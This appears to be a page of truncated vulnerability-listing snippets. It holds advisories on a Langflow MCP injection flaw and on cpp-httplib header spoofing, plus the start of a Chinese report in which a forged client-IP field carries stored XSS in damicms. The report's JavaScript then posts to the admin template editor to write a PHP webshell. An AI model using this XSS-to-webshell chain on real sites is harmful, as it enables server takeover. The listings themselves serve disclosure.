GHSA-V66P-F7X3-4794 Langflow vulnerable to injection

A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function getclientip/installmcpconfig of the file src/backend/base/langflow/api/v1/mcpprojects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument...

CVE-2026-6599

A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function getclientip/installmcpconfig of the file src/backend/base/langflow/api/v1/mcpprojects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument...

EUVD-2025-201454

cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allows attacker-controlled HTTP headers to influence server-visible metadata, logging, and authorization decisions. An attacker can supply X-Forwarded-For or X-Real-IP headers which...

damicms存储xss导致getshell

简要描述： damicms存储xss导致getshell 详细说明： 1Xss Damicms使用了万恶的 getclientip 直接伪造ip，而且ip的字段是varchar50 够我xss了 然后: Ok 2xss导致getshell 由于后台 可以直接编辑文件，生成php马 那我们就用js来直接getshell Js如下: $.ajax "url": "http://192.168.153.132/dami/admin.php?s=/Tpl/Update", "type": "POST", "data":...